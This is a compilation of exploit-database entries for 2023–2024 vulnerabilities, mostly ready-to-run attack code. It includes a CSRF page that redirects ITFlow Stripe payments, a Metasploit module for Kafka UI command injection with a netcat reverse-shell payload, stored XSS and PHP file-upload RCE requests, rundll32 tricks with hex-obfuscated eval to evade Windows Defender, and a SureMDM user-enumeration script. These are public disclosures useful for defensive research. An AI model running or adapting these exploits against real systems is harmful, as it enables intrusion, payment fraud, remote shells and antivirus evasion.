<pre><code># CVE: CVE-2024-25344<br /># CWE: CWE-352<br /># Vendor: ITFlow.org<br /># Affected product: ITFlow - Before commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378<br /># Discoverer: stehled, WP-Pomoc.cz<br /># Attack-Type: Remote<br /># AV: Admin user has to open a page, provided by an attacker, which will then perform malicious request changing system settings.<br /><br />Open source ITFlow was vulnerable to CSRF prior commit 432488eca3998c5be6b6b9e8f8ba01f54bc12378<br />This vulnerability allowed an attacker to change system settings such as online payment information and Microsoft Azure SSO credentials.<br /><br />If admin user is logged in, we can, using provided PoC redirect him to post.php endpoint and make changes to the system. PoC below makes changes to Stripe related settings, which will lead to attacker receiving payments made through the system.<br /><br /><html><br /><form enctype="multipart/form-data" method="POST" action="https://demo.itflow.org/post.php"><br /> <table><br /> <tr><td>edit_online_payment_settings</td><td><input type="text" value="" name="edit_online_payment_settings"></td></tr><br /> <tr><td>config_stripe_enable</td><td><input type="text" value="1" name="config_stripe_enable"></td></tr><br /> <tr><td>config_stripe_publishable</td><td><input type="text" value="csrf-poc" name="config_stripe_publishable"></td></tr><br /> <tr><td>config_stripe_secret</td><td><input type="text" value="csrf-poc-secret" name="config_stripe_secret"></td></tr><br /> <tr><td>config_stripe_account</td><td><input type="text" value="1" name="config_stripe_account"></td></tr><br /> </table><br /> <input type="submit" value="https://demo.itflow.org/post.php"><br /></form><br /></html><br /><br /># Reference<br />https://itflow.org/<br />https://github.com/itflow-org/itflow/commit/432488eca3998c5be6b6b9e8f8ba01f54bc12378<br />https://github.com/itflow-org/itflow/commit/8068cb6081e4760860a634c1066b2c64d0ee2d46<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.',<br /> 'Description' => %q{<br /> A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing<br /> an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter<br /> at the `topic` section.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'BobTheShopLifter and Thingstad', # Discovery of the vulnerability CVE-2023-52251<br /> ],<br /> 'References' => [<br /> ['CVE', '2023-52251'],<br /> ['URL', 'https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251'],<br /> ['URL', 'https://github.com/BobTheShoplifter/CVE-2023-52251-POC']<br /> ],<br /> 'DisclosureDate' => '2023-09-27',<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix/Linux Command',<br /> {<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD],<br /> 'Type' => :unix_cmd,<br /> 'Payload' => {<br /> 'Encoder' => 'cmd/base64',<br /> 'BadChars' => "\x00"<br /> },<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/unix/reverse_netcat'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8080,<br /> 'SSL' => false<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> end<br /><br /> def vuln_version?<br /> @version = ''<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, 'actuator', 'info')<br /> })<br /> if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> if res.body.include?('build')<br /> @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x<br /> elsif res.body.include?('git')<br /> # use case where only the git commit id gets returned without the version information<br /> # determine version using the git commit id to match the first 7 chars of the sha commit stored in data/kafka_ui_versions.json file.<br /> git_commit_id = res_json['git']['commit']['id']<br /> kafka_ui_versions_json = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'kafka_ui_versions.json'), mode: 'rb'))<br /> unless kafka_ui_versions_json.blank?<br /> # loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil<br /> kafka_ui_versions_json.each do |tag|<br /> if tag['commit']['sha'][0, 7] == git_commit_id<br /> @version = tag['name'].delete_prefix('v')<br /> break<br /> end<br /> end<br /> end<br /> end<br /> end<br /> return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)<br /> end<br /> false<br /> end<br /><br /> def get_cluster<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'clusters')<br /> })<br /> if res && res.code == 200 && res.body.include?('status')<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> # loop thru list of clusters and return an active cluster with topic count > 0 else return nil<br /> res_json.each do |cluster|<br /> if cluster['status'] == 'online' || cluster['topicCount'] > 0<br /> return cluster['name']<br /> end<br /> end<br /> end<br /> end<br /> nil<br /> end<br /><br /> def create_topic(cluster)<br /> topic_name = Rex::Text.rand_text_alphanumeric(4..10)<br /> post_data = {<br /> name: topic_name.to_s,<br /> partitions: 1,<br /> replicationFactor: 1,<br /> configs:<br /> {<br /> 'cleanup.policy': 'delete',<br /> 'retention.bytes': '-1'<br /> }<br /> }.to_json<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics'),<br /> 'data' => post_data.to_s<br /> })<br /> if res && res.code == 200 && res.body.include?(topic_name.to_s)<br /> res_json = res.get_json_document<br /> unless res_json.blank?<br /> return res_json['name']<br /> end<br /> end<br /> nil<br /> end<br /><br /> def delete_topic(cluster, topic)<br /> res = send_request_cgi({<br /> 'method' => 'DELETE',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s)<br /> })<br /> return true if res && res.code == 200<br /><br /> false<br /> end<br /><br /> def produce_message(cluster, topic)<br /> # Create a dummy message to trigger the groovy script execution<br /> post_data = {<br /> partition: 0,<br /> key: 'null',<br /> content: 'null',<br /> keySerde: 'String',<br /> valueSerde: 'String'<br /> }.to_json<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'ctype' => 'application/json',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s, 'messages'),<br /> 'data' => post_data.to_s<br /> })<br /> return true if res && res.code == 200<br /><br /> false<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"#{cmd}\").redirectErrorStream(true).start()"<br /> return send_request_cgi({<br /> 'method' => 'GET',<br /> 'ctype' => 'application/x-www-form-urlencoded',<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'clusters', @cluster.to_s, 'topics', @new_topic.to_s, 'messages'),<br /> 'vars_get' => {<br /> 'q' => payload.to_s,<br /> 'filterQueryType' => 'GROOVY_SCRIPT',<br /> 'attempt' => 2,<br /> 'limit' => 100,<br /> 'page' => 0,<br /> 'seekDirection' => 'FORWARD',<br /> 'keySerde' => 'String',<br /> 'valueSerde' => 'String',<br /> 'seekType' => 'BEGINNING'<br /> }<br /> })<br /> end<br /><br /> def check<br /> vprint_status("Checking if #{peer} can be exploited.")<br /> return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?<br /><br /> unless @version.blank?<br /> if @version.match(/\d\.\d\.\d/)<br /> return CheckCode::Safe("Kafka-ui version: #{@version}")<br /> else<br /> return CheckCode::Detected("Kafka-ui unknown version: #{@version}")<br /> end<br /> end<br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")<br /> vprint_status('Searching for active Kafka cluster...')<br /> @cluster = get_cluster<br /> fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?<br /> vprint_good("Active Kafka cluster found: #{@cluster}")<br /><br /> vprint_status('Creating a new topic...')<br /> @new_topic = create_topic(@cluster)<br /> fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?<br /> vprint_good("New topic created: #{@new_topic}")<br /><br /> vprint_status('Trigger Groovy script payload execution by creating a message...')<br /> fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)<br /><br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> end<br /><br /> # cleaning up the mess and remove new created topic<br /> vprint_status('Removing tracks...')<br /> if delete_topic(@cluster, @new_topic)<br /> vprint_good("Successfully deleted topic #{@new_topic}.")<br /> else<br /> print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")<br /> end<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting<br /># Date: 2024-01-03<br /># Exploit Author: Eren Sen<br /># Vendor: SAVSOFT QUIZ<br /># Vendor Homepage: https://savsoftquiz.com<br /># Software Link: https://savsoftquiz.com/web/index.php/online-demo/<br /># Version: < 6.0<br /># CVE-ID: N/A<br /># Tested on: Kali Linux / Windows 10<br /># Vulnerabilities Discovered Date : 2024/01/03<br /><br /># Persistent Cross Site Scripting (XSS) Vulnerability<br /># Vulnerable Parameter Type: POST<br /># Vulnerable Parameter: quiz_name<br /><br /># Proof of Concepts:<br /><br />https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13<br /><br /># HTTP Request:<br /><br />POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1<br />Host: demos1.softaculous.com<br />Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx<br />Content-Length: 411<br />Cache-Control: max-age=0<br />Sec-Ch-Ua:<br />Sec-Ch-Ua-Mobile: ?0<br />Sec-Ch-Ua-Platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: https://demos1.softaculous.com<br />Content-Type: application/x-www-form-urlencoded<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=<br /></code></pre>
<pre><code># Exploit Title: SPA-CART CMS - Stored XSS<br /># Date: 2024-01-03<br /># Exploit Author: Eren Sen<br /># Vendor: SPA-Cart<br /># Vendor Homepage: https://spa-cart.com/<br /># Software Link: https://demo.spa-cart.com/<br /># Version: [1.9.0.3]<br /># CVE-ID: N/A<br /># Tested on: Kali Linux / Windows 10<br /># Vulnerabilities Discovered Date : 2024/01/03<br /><br /># Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability<br /># Vulnerable Parameter Type: POST<br /># Vulnerable Parameter: descr<br /><br /># Proof of Concept: demo.spa-cart.com/product/258<br /><br /># HTTP Request:<br /><br />POST ////admin/products/258 HTTP/2<br />Host: demo.spa-cart.com<br />Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx<br />Content-Length: 1906<br />Sec-Ch-Ua:<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />X-Requested-With: XMLHttpRequest<br />Sec-Ch-Ua-Mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36<br />Sec-Ch-Ua-Platform: ""<br />Origin: https://demo.spa-cart.com<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: https://demo.spa-cart.com////admin/products/258<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="mode"<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="sku"<br /><br />SKU386<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="name"<br /><br />asdf<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="cleanurl"<br /><br />Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads<br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="avail"<br /><br />1000<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="price"<br /><br />0.00<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="list_price"<br /><br />2<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="weight"<br /><br />0.00<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="categoryid"<br /><br />42<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="categories[]"<br /><br />8<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="categories[]"<br /><br />37<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="brandid"<br /><br />4<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="status"<br /><br /><br />1<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="keywords"<br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br /><br />Content-Disposition: form-data; name="descr"<br /><br /><script>alert(1)</script><br /><br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="title_tag"<br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="meta_keywords"<br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl<br />Content-Disposition: form-data; name="meta_description"<br /><br /><br />------WebKitFormBoundaryUsO8JxBs6LhB8LSl--<br /></code></pre>
<pre><code># Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)<br /># Google Dork: N/A<br /># Application: Petrol pump management software<br /># Date: 20.02.2024<br /># Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)<br /># Exploit Author: SoSPiro<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html<br /># Version: 1.0<br /># Tested on: Windows 10 64 bit Wampserver <br /># CVE : N/A<br /><br />## Vulnerability Description:<br /><br />Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload <br />files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder. <br />This allows malicious individuals to execute unauthorized commands on the system.<br /><br /><br />## Staus: HIGH-CRITICAL Vulnerability<br /><br /><br />## Proof of Concept (PoC):<br /><br />Video:<br />https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view<br /><br /><br /><br />// File upload Request<br /><br /><br />POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/zer/fuelflow/admin/web.php<br />Cookie: PHPSESSID=1<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="old_photo1_img"<br /><br />test.png<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="photo1"; filename="3.php"<br />Content-Type: image/png<br /><br /><?php phpinfo();?><br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="title"<br /><br />FuelFlow lite - Developed by Mayuri K. tessss<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="old_photos_img"<br /><br />test.png<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="photos"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="sitekey"<br /><br />test<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="secretkey"<br /><br />test<br />-----------------------------82750242321210078514140255085<br />Content-Disposition: form-data; name="update"<br /><br /><br />-----------------------------82750242321210078514140255085--<br /><br /><br /><br /><br /><br /><br />// Phpinfo file locaton <br /><br />/zerday/fuelflow/assets/images/65d45a6080eca.php<br /></code></pre>
<pre><code># Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload<br /># Google Dork: N/A<br /># Exploit Author: SoSPiro<br /># Date: 2024-02-18<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link: https://phpgurukul.com/tourism-management-system-free-download/<br /># Version: 2.0<br /># Tested on: Windows 10 Pro<br /># Impact: Allows admin to upload all files to the web server<br /># CVE : N/A<br /><br /><br /># Exploit Description:<br />The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.<br /><br /># PoC request<br /><br /><br />POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201<br />Content-Length: 361<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1<br />Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />X-PwnFox-Color: red<br /><br />-----------------------------390927495111779706051786831201<br />Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"<br />Content-Type: text/plain<br /><br /><?php phpinfo();?><br />-----------------------------390927495111779706051786831201<br />Content-Disposition: form-data; name="submit"<br /><br /><br />-----------------------------390927495111779706051786831201--<br /><br /><br /><br /><br />===========================================================================================<br /><br />- Response -<br /><br />HTTP/1.1 200 OK<br />Date: Sun, 18 Feb 2024 04:33:37 GMT<br />Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev<br />X-Powered-By: PHP/8.1.13<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br />Content-Length: 8146<br /><br />============================================================================================<br /><br />- File location -<br /><br />http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: https://hyp3rlinx.altervista.org/advisories/Windows_Defender_Backdoor_JS.Relvelshe.A_Detection_Mitigation_Bypass.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Windows Defender<br /><br /><br />[Vulnerability Type]<br />Detection Mitigation Bypass <br />Backdoor:JS/Relvelshe.A<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Back in 2022 I released a PoC to bypass the Backdoor:JS/Relvelshe.A detection in defender but it no longer works as was mitigated.<br />However, adding a simple javascript try catch error statement and eval the hex string it executes as of the time of this post.<br /><br /><br />[References]<br />https://twitter.com/hyp3rlinx/status/1480657623947091968<br /><br /><br />[Exploit/POC]<br />1) python -m http.server 80<br /><br />2) Open command prompt as Administrator<br /><br />3) rundll32 javascript:"\\..\\..\\mshtml\\..\\..\\mshtml,RunHTMLApplication ,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://localhost/yo.tmp")<br /><br />Create file and host on server, this is contents of the "yo.tmp" file.<br /><br /><?xml version="1.0"?><br /><component><br /><script><br />try{<br /><![CDATA[<br />var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";<br />var str = '';<br />for (var n = 0; n < hex.length; n += 2) {<br />str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));<br />}<br />eval(str)<br />]]><br />}catch(e){<br />eval(str)<br />}<br /></script><br /></component><br /><br /><br />[Network Access]<br />Local<br /><br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: <br />February 18, 2024: Public Disclosure<br /><br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code>[+] Credits: John Page (aka hyp3rlinx) <br />[+] Website: hyp3rlinx.altervista.org<br />[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_VBSCRIPT_TROJAN_MITIGATION_BYPASS.txt<br />[+] twitter.com/hyp3rlinx<br />[+] ISR: ApparitionSec <br /> <br /><br />[Vendor]<br />www.microsoft.com<br /><br /><br />[Product]<br />Windows Defender<br /><br /><br />[Vulnerability Type]<br />Windows Defender VBScript Detection Mitigation Bypass<br />TrojanWin32Powessere.G<br /><br /><br />[CVE Reference]<br />N/A<br /><br /><br />[Security Issue]<br />Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail<br />and attackers will typically get an "Access is denied" error message. Previously I have disclosed 3 bypasses using rundll32 javascript, this example leverages VBSCRIPT and ActiveX engine.<br /><br />Running rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0), will typically get blocked by Windows Defender with<br />an "Access is denied" message.<br /><br />Trojan:Win32/Powessere.G<br />Category: Trojan<br />This program is dangerous and executes commands from an attacker.<br /><br />However, you can add arbitrary text for the 2nd mshtml parameter to build off my previous javascript based bypasses to skirt defender detection.<br />Example, adding "shtml", "Lol" or other text and it will execute as of the time of this writing.<br /><br />E.g.<br /><br />C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\PWN\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)<br /><br /><br />[References]<br />https://twitter.com/hyp3rlinx/status/1759260962761150468<br />https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART_3.txt<br />https://lolbas-project.github.io/lolbas/Binaries/Rundll32/<br /><br /><br />[Exploit/POC]<br />Open command prompt as Administrator<br /><br />C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\mshtml\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)<br />Access is denied.<br /><br />C:\sec>rundll32 vbscript:"\\..\\mshtml\\..\\LoL\\..\\mshtml,RunHTMLApplication "+String(CreateObject("Wscript.Shell").Run("calc.exe"),0)<br /><br />We win!<br /><br />[Network Access]<br />Local<br /><br /><br />[Severity]<br />High<br /><br /><br />[Disclosure Timeline]<br />Vendor Notification: <br />February 18, 2024 : Public Disclosure<br /><br /><br /><br />[+] Disclaimer<br />The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.<br />Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and<br />that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit<br />is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility<br />for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information<br />or exploits by the author or elsewhere. All content (c).<br /><br />hyp3rlinx<br /></code></pre>
<pre><code># Exploit Title: InstantCMS - Store XSS<br /># Application: InstantCMS <br /># Version: v2.16.1 <br /># Bugs: Stored XSS<br /># Technology: PHP<br /># Vendor Homepage: https://instantcms.ru/<br /># Software Link: https://instantcms.ru/get<br /># Date: 14.09.2023<br /># Author: SoSPiro<br /># Tested on: Windows<br /><br />## Description<br /><br />I noticed that you filtered the filter very carefully. But there are still some parts you missed<br /><br /><br />## POC<br /><br />1 . Login with admin<br />2 . Go to "http://localhost/o2/admin/menu/item_edit/18"<br />3 . Insert payload in CSS class<br />4 . Click save , and go to home page, and Detect store xss in footer<br />https://drive.google.com/file/d/1_9QGoBnbZZrsHUgNkujja1Ptj3f8fl2W/view?usp=sharing<br /><br /><br />## Impact<br /><br />This security vulnerability has the potential to steal multiple users' cookies, gain unauthorized access to that user's account through stolen cookies, or redirect the user to other malicious websites...<br /><br />## Bug fix commit<br /><br />https://github.com/instantsoft/icms2/commit/b2172a0f842fc28966b00bab3e2e9094c6bfd156<br /><br /><br />## Reference<br /><br />https://huntr.com/bounties/18546c85-de6a-4252-a02f-c9d26f4f775e/<br /></code></pre>
<pre><code># Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration<br /># Date: 05/12/2023<br /># Exploit Author: Jonas Benjamin Friedli<br /># Vendor Homepage: https://www.42gears.com/products/mobile-device-management/<br /># Version: <= 6.31<br /># Tested on: 6.31<br /># CVE : CVE-2023-3897<br /><br />import requests<br />import sys<br /><br />def print_help():<br /> print("Usage: python script.py [URL] [UserListFile]")<br /> sys.exit(1)<br /><br /><br />def main():<br /> if len(sys.argv) != 3 or sys.argv[1] == '-h':<br /> print_help()<br /><br /> url, user_list_file = sys.argv[1], sys.argv[2]<br /><br /> try:<br /> with open(user_list_file, 'r') as file:<br /> users = file.read().splitlines()<br /> except FileNotFoundError:<br /> print(f"User list file '{user_list_file}' not found.")<br /> sys.exit(1)<br /><br /> valid_users = []<br /> bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest"<br /> enumerate_txt = "This User ID/Email ID is not registered."<br /> for index, user in enumerate(users):<br /> progress = (index + 1) / len(users) * 100<br /> print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r")<br /><br /> data = {"UserId": user}<br /> response = requests.post(<br /> f"{url}{bypass_dir}",<br /> json=data,<br /> headers={"Content-Type": "application/json; charset=utf-8"}<br /> )<br /><br /> if response.status_code == 200:<br /> response_data = response.json()<br /> if enumerate_txt not in response_data.get('d', {}).get('message', ''):<br /> valid_users.append(user)<br /><br /> print("\nFinished processing users.")<br /> print(f"Valid Users Found: {len(valid_users)}")<br /> for user in valid_users:<br /> print(user)<br /><br />if __name__ == "__main__":<br /> main()<br /><br /></code></pre>